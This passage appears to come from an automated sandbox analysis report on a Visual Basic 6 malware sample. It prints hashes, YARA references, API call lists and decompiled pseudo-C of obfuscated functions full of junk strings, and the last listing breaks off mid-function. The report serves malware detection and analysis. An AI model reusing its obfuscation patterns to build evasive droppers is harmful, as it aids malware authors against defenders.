              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e7ce6642860003329111c5f3f63286dbd2a9708e896dd5f58514ea0f9a4f1765
              • Instruction ID: a6c146d1094cbcfd4f56f91b6b551833ab628a49edf3a0b98c8eb5c0c541da6f
              • Opcode Fuzzy Hash: e7ce6642860003329111c5f3f63286dbd2a9708e896dd5f58514ea0f9a4f1765
              • Instruction Fuzzy Hash: ADB012303C42459A5700A3D49C414E421C0B300B803248C33F961C22F0CB28CE80C13D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00411584, Relevance: .0, Instructions: 8COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 299 411584-41158b 300 41158d 299->300 301 41158f-411594 299->301 300->301 302 41159b 301->302 302->302
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fcff76bda4eadf623f2e77a8838a93edb95a1cfd33e6a10e38e2de9a95c1cfd9
              • Instruction ID: c19c6bfd506ab4166eb4f75b593db9ca641eba6ae79acba2102610b16182defd
              • Opcode Fuzzy Hash: fcff76bda4eadf623f2e77a8838a93edb95a1cfd33e6a10e38e2de9a95c1cfd9
              • Instruction Fuzzy Hash: 21B012307C4105BE530083984C014B02182A388FC03344C33FA22C21B0CE28CE80C52E
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Function 0040994D, Relevance: 12.3, Strings: 9, Instructions: 1013COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: *$-$1$2$L$R$h$m$y
              • API String ID: 0-851722822
              • Opcode ID: a19d9bcf030524ba966af9d060c27a35a791e9a6969b0e11bf1e8b03fd7309a6
              • Instruction ID: 8518cc57bad88dc175f749ae4167e37c98c9a58b09fadc07fa7117fc56a08340
              • Opcode Fuzzy Hash: a19d9bcf030524ba966af9d060c27a35a791e9a6969b0e11bf1e8b03fd7309a6
              • Instruction Fuzzy Hash: E642EE41E6A70689FFB22130C1D076D6650DF16385F318F37D861F68E2BA2F86CA159B
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004099E1, Relevance: 7.2, Strings: 5, Instructions: 994COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: 2$L$h$m$y
              • API String ID: 0-2588458195
              • Opcode ID: 59cba497f1aa2a01587249dd4db40d72cf124cc6a3b4f246ebe3fc34d43a7866
              • Instruction ID: c0933b7c6b4dfa0444f0d160bf5fd3a5738566c41486788d8032b4d5d224362f
              • Opcode Fuzzy Hash: 59cba497f1aa2a01587249dd4db40d72cf124cc6a3b4f246ebe3fc34d43a7866
              • Instruction Fuzzy Hash: FD42ED41E6A70689FFB22130C1D076D6650DF16385F318F37D861F68E2AA2FC6CA159B
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00409A6E, Relevance: 5.9, Strings: 4, Instructions: 940COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: 2$L$h$m
              • API String ID: 0-147965919
              • Opcode ID: 670dde1f0c4d7862eb83e6be5b6f9b2bc13565ab786e5a075ad63d83f8c7b16a
              • Instruction ID: 6c8cecad92f8086caae248271e9f6c5352b9b3f9139d17d3290aa6f6c2a8d98f
              • Opcode Fuzzy Hash: 670dde1f0c4d7862eb83e6be5b6f9b2bc13565ab786e5a075ad63d83f8c7b16a
              • Instruction Fuzzy Hash: 3842FD41E6A70689FFB22130C1D076D6650DF16385F318F37D861F68E2BA2F86CA159B
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004011CA, Relevance: .3, Instructions: 336COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 211c5153b07f7db4384643af17047e8915e8ea3ce6eb3f6734be7a34a2f9e3b0
              • Instruction ID: 5588ee880917280b0ced7d332235e4f84e9223f84c849436f3f3a4410ff70850
              • Opcode Fuzzy Hash: 211c5153b07f7db4384643af17047e8915e8ea3ce6eb3f6734be7a34a2f9e3b0
              • Instruction Fuzzy Hash: 84B1055058E3C14FE71B8B7448BA1D1BFA0AE1322472E56EFC5C68E4A3D15D845BC726
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00415C93, Relevance: 56.2, APIs: 28, Strings: 4, Instructions: 236COMMON
              Download Yara Rule

              Control-flow Graph

              C-Code - Quality: 51%
              			E00415C93(void* __ebx, void* __ecx, void* __edi, void* __esi, long long __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long _v28;
				void* _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				char _v60;
				char _v76;
				char _v92;
				char _v108;
				char* _v132;
				char _v140;
				intOrPtr _v148;
				char _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v180;
				signed int _v184;
				intOrPtr* _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				intOrPtr* _v204;
				signed int _v208;
				signed int _t120;
				signed int _t131;
				char* _t138;
				char* _t139;
				signed int _t143;
				char* _t147;
				signed int _t150;
				signed int _t156;
				signed int _t161;
				signed int* _t165;
				intOrPtr _t182;
				long long* _t183;
				long long _t196;

				_t196 = __fp0;
				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t182;
				L004016F0();
				_v12 = _t182;
				_v8 = 0x401598;
				_v132 = L"8-8-8";
				_v140 = 8;
				_t165 =  &_v60;
				L004018A0();
				_push( &_v60);
				_push( &_v76);
				L004017E6();
				_v148 = 8;
				_v156 = 0x8002;
				_push( &_v76);
				_t120 =  &_v156;
				_push(_t120);
				L00401828();
				_v160 = _t120;
				_push( &_v76);
				_push( &_v60);
				_push(2);
				L00401942();
				_t183 = _t182 + 0xc;
				if(_v160 != 0) {
					if( *0x4183d8 != 0) {
						_v188 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4119c8);
						L004018C4();
						_v188 = 0x4183d8;
					}
					_v160 =  *_v188;
					_t156 =  *((intOrPtr*)( *_v160 + 0x4c))(_v160,  &_v40);
					asm("fclex");
					_v164 = _t156;
					if(_v164 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x4119b8);
						_push(_v160);
						_push(_v164);
						L00401906();
						_v192 = _t156;
					}
					_v168 = _v40;
					_t161 =  *((intOrPtr*)( *_v168 + 0x24))(_v168, L"samtaleemnetsrhes", L"rebslagerierneshand",  &_v36);
					asm("fclex");
					_v172 = _t161;
					if(_v172 >= 0) {
						_v196 = _v196 & 0x00000000;
					} else {
						_push(0x24);
						_push(0x411c68);
						_push(_v168);
						_push(_v172);
						L00401906();
						_v196 = _t161;
					}
					_v180 = _v36;
					_v36 = _v36 & 0x00000000;
					L00401882();
					_t165 =  &_v40;
					L004018AC();
				}
				_push( &_v60);
				L004017DA();
				_push( &_v60);
				asm("fld1");
				_push(_t165);
				_push(_t165);
				 *_t183 = _t196;
				_push(0x411c7c);
				_push( &_v76);
				L004017E0();
				_push( &_v92);
				L004017DA();
				_v132 = 1;
				_v140 = 2;
				_push( &_v76);
				_push( &_v92);
				_push( &_v140);
				_t131 =  &_v108;
				_push(_t131);
				L004018E2();
				_push(_t131);
				L00401828();
				_v160 = _t131;
				_push( &_v108);
				_push( &_v76);
				_push( &_v92);
				_push( &_v60);
				_push(4);
				L00401942();
				if(_v160 != 0) {
					_t143 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v40);
					asm("fclex");
					_v160 = _t143;
					if(_v160 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0x160);
						_push(0x41046c);
						_push(_a4);
						_push(_v160);
						L00401906();
						_v200 = _t143;
					}
					if( *0x4183d8 != 0) {
						_v204 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4119c8);
						L004018C4();
						_v204 = 0x4183d8;
					}
					_v164 =  *_v204;
					_v184 = _v40;
					_v40 = _v40 & 0x00000000;
					_t147 =  &_v44;
					L00401888();
					_t150 =  *((intOrPtr*)( *_v164 + 0x40))(_v164, _t147, _t147, _v184, L"UNSERIALIZABLE");
					asm("fclex");
					_v168 = _t150;
					if(_v168 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0x40);
						_push(0x4119b8);
						_push(_v164);
						_push(_v168);
						L00401906();
						_v208 = _t150;
					}
					L004018AC();
				}
				_push( &_v60);
				L004017DA();
				_t138 =  &_v60;
				_push(_t138);
				L004017D4();
				_v160 =  ~(0 | _t138 != 0x0000ffff);
				L00401912();
				_t139 = _v160;
				if(_t139 != 0) {
					_v132 = L"EXOCRINOLOGY";
					_v140 = 8;
					L004018A0();
					_push(2);
					_t139 =  &_v60;
					_push(_t139);
					L004018A6();
					_v28 = _t196;
					L00401912();
				}
				asm("wait");
				_push(0x41607f);
				L00401924();
				return _t139;
			}











































              0x00415c93
              0x00415c98
              0x00415ca3
              0x00415ca4
              0x00415cb0
              0x00415cb8
              0x00415cbb
              0x00415cc2
              0x00415cc9
              0x00415cd9
              0x00415cdc
              0x00415ce4
              0x00415ce8
              0x00415ce9
              0x00415cee
              0x00415cf8
              0x00415d05
              0x00415d06
              0x00415d0c
              0x00415d0d
              0x00415d12
              0x00415d1c
              0x00415d20
              0x00415d21
              0x00415d23
              0x00415d28
              0x00415d34
              0x00415d41
              0x00415d5e
              0x00415d43
              0x00415d43
              0x00415d48
              0x00415d4d
              0x00415d52
              0x00415d52
              0x00415d70
              0x00415d88
              0x00415d8b
              0x00415d8d
              0x00415d9a
              0x00415dbc
              0x00415d9c
              0x00415d9c
              0x00415d9e
              0x00415da3
              0x00415da9
              0x00415daf
              0x00415db4
              0x00415db4
              0x00415dc6
              0x00415de8
              0x00415deb
              0x00415ded
              0x00415dfa
              0x00415e1c
              0x00415dfc
              0x00415dfc
              0x00415dfe
              0x00415e03
              0x00415e09
              0x00415e0f
              0x00415e14
              0x00415e14
              0x00415e26
              0x00415e2c
              0x00415e39
              0x00415e3e
              0x00415e41
              0x00415e41
              0x00415e49
              0x00415e4a
              0x00415e52
              0x00415e53
              0x00415e55
              0x00415e56
              0x00415e57
              0x00415e5a
              0x00415e62
              0x00415e63
              0x00415e6b
              0x00415e6c
              0x00415e71
              0x00415e78
              0x00415e85
              0x00415e89
              0x00415e90
              0x00415e91
              0x00415e94
              0x00415e95
              0x00415e9a
              0x00415e9b
              0x00415ea0
              0x00415eaa
              0x00415eae
              0x00415eb2
              0x00415eb6
              0x00415eb7
              0x00415eb9
              0x00415eca
              0x00415edc
              0x00415ee2
              0x00415ee4
              0x00415ef1
              0x00415f13
              0x00415ef3
              0x00415ef3
              0x00415ef8
              0x00415efd
              0x00415f00
              0x00415f06
              0x00415f0b
              0x00415f0b
              0x00415f21
              0x00415f3e
              0x00415f23
              0x00415f23
              0x00415f28
              0x00415f2d
              0x00415f32
              0x00415f32
              0x00415f50
              0x00415f59
              0x00415f5f
              0x00415f6e
              0x00415f72
              0x00415f86
              0x00415f89
              0x00415f8b
              0x00415f98
              0x00415fba
              0x00415f9a
              0x00415f9a
              0x00415f9c
              0x00415fa1
              0x00415fa7
              0x00415fad
              0x00415fb2
              0x00415fb2
              0x00415fc4
              0x00415fc4
              0x00415fcc
              0x00415fcd
              0x00415fd2
              0x00415fd5
              0x00415fd6
              0x00415fe6
              0x00415ff0
              0x00415ff5
              0x00415ffe
              0x00416000
              0x00416007
              0x0041601a
              0x0041601f
              0x00416021
              0x00416024
              0x00416025
              0x0041602a
              0x00416030
              0x00416030
              0x00416035
              0x00416036
              0x00416079
              0x0041607e

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00415CB0
              • __vbaVarDup.MSVBVM60 ref: 00415CDC
              • #542.MSVBVM60(?,?), ref: 00415CE9
              • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 00415D0D
              • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 00415D23
              • __vbaNew2.MSVBVM60(004119C8,004183D8), ref: 00415D4D
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,0000004C), ref: 00415DAF
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C68,00000024), ref: 00415E0F
              • __vbaStrMove.MSVBVM60(00000000,?,00411C68,00000024), ref: 00415E39
              • __vbaFreeObj.MSVBVM60(00000000,?,00411C68,00000024), ref: 00415E41
              • #610.MSVBVM60(?), ref: 00415E4A
              • #661.MSVBVM60(?,00411C7C,?,?,?,?), ref: 00415E63
              • #610.MSVBVM60(?,?,00411C7C,?,?,?,?), ref: 00415E6C
              • __vbaVarAdd.MSVBVM60(?,00000002,?,?), ref: 00415E95
              • __vbaVarTstNe.MSVBVM60(00000000,?,00000002,?,?), ref: 00415E9B
              • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,00000000,?,00000002,?,?), ref: 00415EB9
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041046C,00000160), ref: 00415F06
              • __vbaNew2.MSVBVM60(004119C8,004183D8), ref: 00415F2D
              • __vbaObjSet.MSVBVM60(?,?,UNSERIALIZABLE), ref: 00415F72
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,00000040), ref: 00415FAD
              • __vbaFreeObj.MSVBVM60(00000000,?,004119B8,00000040), ref: 00415FC4
              • #610.MSVBVM60(?,00411C7C,?,?,?,?), ref: 00415FCD
              • #557.MSVBVM60(?,?,00411C7C,?,?,?,?), ref: 00415FD6
              • __vbaFreeVar.MSVBVM60(?,?,00411C7C,?,?,?,?), ref: 00415FF0
              • __vbaVarDup.MSVBVM60(?,?), ref: 0041601A
              • #600.MSVBVM60(?,00000002), ref: 00416025
              • __vbaFreeVar.MSVBVM60(?,00000002), ref: 00416030
              • __vbaFreeStr.MSVBVM60(0041607F,?,?,00411C7C,?,?,?,?), ref: 00416079
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$CheckHresult$#610$ListNew2$#542#557#600#661ChkstkMove
              • String ID: 8-8-8$UNSERIALIZABLE$rebslagerierneshand$samtaleemnetsrhes
              • API String ID: 1830445602-790280245
              • Opcode ID: 63805e2af0a9303562acf4776bfe05b8b97931d6d75884ff5088fa00df827d8c
              • Instruction ID: ca315806d1a5601dea0a7704ff17c1b4bf1bc088f4ce65a675bcd1d513e0be86
              • Opcode Fuzzy Hash: 63805e2af0a9303562acf4776bfe05b8b97931d6d75884ff5088fa00df827d8c
              • Instruction Fuzzy Hash: 50A1C57191021CEFDB10EBA1CC45FDEBBB8BF04704F5081AAE149B61A1DB785A89CF59
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00416665, Relevance: 45.6, APIs: 21, Strings: 5, Instructions: 148COMMON
              Download Yara Rule

              Control-flow Graph

              C-Code - Quality: 59%
              			E00416665(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v40;
				short _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v60;
				char _v68;
				char _v84;
				char* _v108;
				intOrPtr _v116;
				intOrPtr _v124;
				char _v132;
				void* _v136;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				intOrPtr _v156;
				intOrPtr* _v160;
				signed int _v164;
				signed int _v168;
				signed int _t74;
				short _t82;
				signed int _t85;
				signed int _t91;
				signed int _t96;
				intOrPtr _t121;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t121;
				L004016F0();
				_v12 = _t121;
				_v8 = 0x401640;
				_v60 = 0xe;
				_v68 = 2;
				_t74 =  &_v68;
				_push(_t74);
				L004017BC();
				L00401882();
				_push(_t74);
				_push(L"Out of string space");
				L0040184C();
				asm("sbb eax, eax");
				_v136 =  ~( ~( ~_t74));
				L00401924();
				L00401912();
				if(_v136 != 0) {
					_v108 = L"Statscheferstronhi8";
					_v116 = 8;
					L004018A0();
					_push( &_v68);
					_push( &_v84);
					L004017B6();
					L004018E8();
					L00401912();
				}
				_v108 = L"8-8-8";
				_v116 = 8;
				L004018A0();
				_push( &_v68);
				_push( &_v84);
				L004017E6();
				_v124 = 8;
				_v132 = 0x8002;
				_push( &_v84);
				_t82 =  &_v132;
				_push(_t82);
				L00401828();
				_v136 = _t82;
				_push( &_v84);
				_push( &_v68);
				_push(2);
				L00401942();
				_t85 = _v136;
				if(_t85 != 0) {
					if( *0x4183d8 != 0) {
						_v160 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4119c8);
						L004018C4();
						_v160 = 0x4183d8;
					}
					_v136 =  *_v160;
					_t91 =  *((intOrPtr*)( *_v136 + 0x4c))(_v136,  &_v52);
					asm("fclex");
					_v140 = _t91;
					if(_v140 >= 0) {
						_v164 = _v164 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x4119b8);
						_push(_v136);
						_push(_v140);
						L00401906();
						_v164 = _t91;
					}
					_v144 = _v52;
					_t96 =  *((intOrPtr*)( *_v144 + 0x24))(_v144, L"Dedications3", L"Lumskes6",  &_v48);
					asm("fclex");
					_v148 = _t96;
					if(_v148 >= 0) {
						_v168 = _v168 & 0x00000000;
					} else {
						_push(0x24);
						_push(0x411c68);
						_push(_v144);
						_push(_v148);
						L00401906();
						_v168 = _t96;
					}
					_t85 = _v48;
					_v156 = _t85;
					_v48 = _v48 & 0x00000000;
					L00401882();
					L004018AC();
				}
				_v44 = 0x2a89;
				_push(0x4168dd);
				L00401924();
				L00401912();
				return _t85;
			}































              0x0041666a
              0x00416675
              0x00416676
              0x00416682
              0x0041668a
              0x0041668d
              0x00416694
              0x0041669b
              0x004166a2
              0x004166a5
              0x004166a6
              0x004166b0
              0x004166b5
              0x004166b6
              0x004166bb
              0x004166c2
              0x004166c8
              0x004166d2
              0x004166da
              0x004166e8
              0x004166ea
              0x004166f1
              0x004166fe
              0x00416706
              0x0041670a
              0x0041670b
              0x00416716
              0x0041671e
              0x0041671e
              0x00416723
              0x0041672a
              0x00416737
              0x0041673f
              0x00416743
              0x00416744
              0x00416749
              0x00416750
              0x0041675a
              0x0041675b
              0x0041675e
              0x0041675f
              0x00416764
              0x0041676e
              0x00416772
              0x00416773
              0x00416775
              0x0041677d
              0x00416786
              0x00416793
              0x004167b0
              0x00416795
              0x00416795
              0x0041679a
              0x0041679f
              0x004167a4
              0x004167a4
              0x004167c2
              0x004167da
              0x004167dd
              0x004167df
              0x004167ec
              0x0041680e
              0x004167ee
              0x004167ee
              0x004167f0
              0x004167f5
              0x004167fb
              0x00416801
              0x00416806
              0x00416806
              0x00416818
              0x0041683a
              0x0041683d
              0x0041683f
              0x0041684c
              0x0041686e
              0x0041684e
              0x0041684e
              0x00416850
              0x00416855
              0x0041685b
              0x00416861
              0x00416866
              0x00416866
              0x00416875
              0x00416878
              0x0041687e
              0x0041688b
              0x00416893
              0x00416893
              0x00416898
              0x0041689e
              0x004168cf
              0x004168d7
              0x004168dc

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00416682
              • #651.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 004166A6
              • __vbaStrMove.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 004166B0
              • __vbaStrCmp.MSVBVM60(Out of string space,00000000,00000002), ref: 004166BB
              • __vbaFreeStr.MSVBVM60(Out of string space,00000000,00000002), ref: 004166D2
              • __vbaFreeVar.MSVBVM60(Out of string space,00000000,00000002), ref: 004166DA
              • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 004166FE
              • #666.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 0041670B
              • __vbaVarMove.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 00416716
              • __vbaFreeVar.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 0041671E
              • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 00416737
              • #542.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,Out of string space,00000000,00000002), ref: 00416744
              • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,00000002,?,?,?,?,?,?,?,?,?,Out of string space), ref: 0041675F
              • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008002,?,?,?,?,00000002), ref: 00416775
              • __vbaNew2.MSVBVM60(004119C8,004183D8), ref: 0041679F
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,0000004C), ref: 00416801
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C68,00000024), ref: 00416861
              • __vbaStrMove.MSVBVM60(00000000,?,00411C68,00000024), ref: 0041688B
              • __vbaFreeObj.MSVBVM60(00000000,?,00411C68,00000024), ref: 00416893
              • __vbaFreeStr.MSVBVM60(004168DD), ref: 004168CF
              • __vbaFreeVar.MSVBVM60(004168DD), ref: 004168D7
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$Move$CheckHresult$#542#651#666ChkstkListNew2
              • String ID: 8-8-8$Dedications3$Lumskes6$Out of string space$Statscheferstronhi8
              • API String ID: 2969453677-2753518913
              • Opcode ID: 9fec63f6a33a842afd552f667e00ca62eaa72fe506a1c693441ee8aa2b89fa2e
              • Instruction ID: a0fe6445e929136b75add726ea654f574ad1f399f1b37aa8667a4cefb3521d8e
              • Opcode Fuzzy Hash: 9fec63f6a33a842afd552f667e00ca62eaa72fe506a1c693441ee8aa2b89fa2e
              • Instruction Fuzzy Hash: F8511871900229DFDB10EFA1CC85BDEB7B8BF04704F5081AAE109B71A1DB785A89CF58
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00416E2E, Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 177COMMON
              Download Yara Rule

              Control-flow Graph

              C-Code - Quality: 46%
              			E00416E2E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v44;
				intOrPtr _v52;
				char _v60;
				intOrPtr _v68;
				intOrPtr _v76;
				char* _v100;
				intOrPtr _v108;
				intOrPtr _v132;
				intOrPtr _v140;
				void* _v160;
				signed int _v164;
				intOrPtr* _v168;
				signed int _v172;
				signed int _v184;
				intOrPtr* _v188;
				signed int _v192;
				signed int _v196;
				void* _t75;
				char* _t76;
				short _t77;
				signed int _t83;
				signed int _t89;
				void* _t117;
				void* _t119;
				intOrPtr _t120;

				_t120 = _t119 - 0xc;
				 *[fs:0x0] = _t120;
				L004016F0();
				_v16 = _t120;
				_v12 = 0x401698;
				_v8 = 0;
				_t75 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4016f6, _t117);
				_push(2);
				_push("ABC");
				_push(0x411d88);
				_push(0);
				L0040182E();
				if(_t75 != 3) {
					_v68 = _a4;
					_v76 = 9;
					_v100 = L"bucketeer";
					_v108 = 8;
					_v132 = 0x498b97;
					_v140 = 3;
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(3);
					_push(L"YxNVQiKDdS8jUWPTmdnm0qt5ZhOCXQ1Dg81");
					_push(_v36);
					L004018FA();
					_t120 = _t120 + 0x3c;
				}
				_v52 = 0x98e72e79;
				_v60 = 3;
				_t76 =  &_v60;
				_push(_t76);
				L00401798();
				_v160 =  ~(0 | _t76 != 0x0000ffff);
				L00401912();
				_t77 = _v160;
				if(_t77 != 0) {
					if( *0x4183d8 != 0) {
						_v188 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4119c8);
						L004018C4();
						_v188 = 0x4183d8;
					}
					_v160 =  *_v188;
					_t83 =  *((intOrPtr*)( *_v160 + 0x1c))(_v160,  &_v40);
					asm("fclex");
					_v164 = _t83;
					if(_v164 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x4119b8);
						_push(_v160);
						_push(_v164);
						L00401906();
						_v192 = _t83;
					}
					_v168 = _v40;
					_v68 = 0x80020004;
					_v76 = 0xa;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t89 =  *((intOrPtr*)( *_v168 + 0x54))(_v168, 0x10,  &_v44);
					asm("fclex");
					_v172 = _t89;
					if(_v172 >= 0) {
						_v196 = _v196 & 0x00000000;
					} else {
						_push(0x54);
						_push(0x411b0c);
						_push(_v168);
						_push(_v172);
						L00401906();
						_v196 = _t89;
					}
					_v184 = _v44;
					_v44 = _v44 & 0x00000000;
					_v52 = _v184;
					_v60 = 9;
					_t77 = 0x10;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v32);
					L0040191E();
					L004018AC();
					L00401912();
				}
				_push(1);
				L00401792();
				if(_t77 != 0x800000) {
					L00401870();
				}
				_v28 =  *0x401690;
				asm("wait");
				_push(0x4170d2);
				L004018AC();
				L004018AC();
				return _t77;
			}



































              0x00416e31
              0x00416e40
              0x00416e4c
              0x00416e54
              0x00416e57
              0x00416e5e
              0x00416e6d
              0x00416e70
              0x00416e72
              0x00416e77
              0x00416e7c
              0x00416e7e
              0x00416e86
              0x00416e8b
              0x00416e8e
              0x00416e95
              0x00416e9c
              0x00416ea3
              0x00416eaa
              0x00416eb4
              0x00416eb7
              0x00416ec1
              0x00416ec2
              0x00416ec3
              0x00416ec4
              0x00416ec5
              0x00416ec8
              0x00416ed2
              0x00416ed3
              0x00416ed4
              0x00416ed5
              0x00416ed6
              0x00416ed9
              0x00416ee6
              0x00416ee7
              0x00416ee8
              0x00416ee9
